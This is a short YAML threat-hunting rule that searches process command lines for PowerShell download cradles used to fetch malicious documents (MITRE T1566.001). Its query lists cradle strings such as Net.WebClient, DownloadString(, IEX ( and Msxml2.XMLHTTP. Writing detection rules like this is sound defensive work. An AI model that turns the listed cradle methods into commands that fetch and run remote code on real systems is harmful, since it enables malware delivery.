title: Powershell MalDoc
description: This test merely uses Powershell to download a maldoc, the below query
  will find CommandLine or CommandScript downloads using multiple cradle methods as
  documented here by HarmJ0y https://gist.github.com/HarmJ0y/bb48307ffa663256e239.
  The below query should only be used for hunting purposes and covers most unobfuscated
  powershell cradles.
author: keyboardcrunch
date: 10/10/2020
modified: null
mitre:
   tactic: Initial Access
   technique: T1566
   subtechnique: 001
operating_system: windows
query: (SrcProcCmdLine In Contains Anycase ("Net.WebClient","(iwr","DownloadString(","WinHttp.WinHttpRequest","IEX
  (","InternetExplorer.Application","Msxml2.XMLHTTP","MSXML2.ServerXMLHTTP") OR SrcProcCmdScript
  In Contains Anycase ("Net.WebClient","(iwr","DownloadString(","WinHttp.WinHttpRequest","IEX
  (","InternetExplorer.Application","Msxml2.XMLHTTP","MSXML2.ServerXMLHTTP"))
false_positives: null
tags: null